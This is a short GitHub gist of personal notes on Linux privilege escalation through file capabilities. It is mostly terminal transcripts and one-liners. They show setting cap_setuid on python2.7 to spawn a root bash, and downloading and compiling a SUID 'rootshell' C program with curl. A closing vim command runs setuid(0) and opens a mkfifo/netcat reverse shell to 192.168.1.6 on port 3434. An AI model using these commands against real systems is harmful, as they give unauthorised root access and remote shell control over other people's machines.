Last active
February 9, 2021 21:24
-
-
Save dualfade/63e93a2c0068996593c852ba702e44a5 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| file with cap_setuid+ep ?? | |
| user with perms to make it so == root | |
| Just some notes -- | |
| [user@lemur tmp]$ hostname ; id | |
| lemur | |
| uid=1001(user) gid=1001(user) groups=1001(user) | |
| [user@lemur tmp]$ sudo -l | |
| Matching Defaults entries for user on this host: | |
| requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR | |
| USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC | |
| LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin | |
| User user may run the following commands on this host: | |
| (ALL) NOPASSWD: /usr/sbin/capsh, (ALL) /usr/sbin/setcap | |
| [user@lemur tmp]$ which python2.7 | |
| /usr/bin/python2.7 | |
| [user@lemur tmp]$ ls -l /usr/bin/python2.7 | |
| -rwxr-xr-x. 1 root root 7136 Jun 17 2014 /usr/bin/python2.7 | |
| [user@lemur tmp]$ sudo /usr/sbin/setcap cap_setuid+ep /usr/bin/python2.7 | |
| [user@lemur tmp]$ getcap /usr/bin/python2.7 | |
| /usr/bin/python2.7 = cap_setuid+ep | |
| [user@lemur tmp]$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash ")' | |
| [root@lemur tmp]# id | |
| uid=0(root) gid=1001(user) groups=0(root),1001(user) | |
| [root@lemur tmp]# | |
| Downloaded suid shell -- | |
| [user@lemur tmp]$ id | |
| uid=1001(user) gid=1001(user) groups=1001(user) | |
| [user@lemur tmp]$ curl -sk -O https://raw.githubusercontent.com/jivoi/pentest/master/shell/rootshell.c | |
| [user@lemur tmp]$ gcc -o /tmp/rootshell /tmp/rootshell.c | |
| [user@lemur tmp]$ cat rootshell.c | |
| // gcc -o /tmp/rootshell /tmp/rootshell.c | |
| // chmod u+s /tmp/rootshell | |
| #include <stdio.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| int main(void) | |
| { | |
| setuid(0); setgid(0); system("/bin/bash"); | |
| }[user@lemur tmp]$ chmod 4755 rootshell | |
| You have new mail in /var/spool/mail/user | |
| [user@lemur tmp]$ sudo /usr/sbin/setcap cap_setuid+ep rootshell | |
| [user@lemur tmp]$ getcap rootshell | |
| rootshell = cap_setuid+ep | |
| [user@lemur tmp]$ ./rootshell | |
| [root@lemur tmp]# id | |
| uid=0(root) gid=1001(user) groups=0(root),1001(user) | |
| [root@lemur tmp]# | |
| VIM w/ caps; | |
| /usr/bin/vim.basic = cap_setuid+ep | |
| vim -c 'py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' | |
| vim -c 'py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.6 3434 >/tmp/f")' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment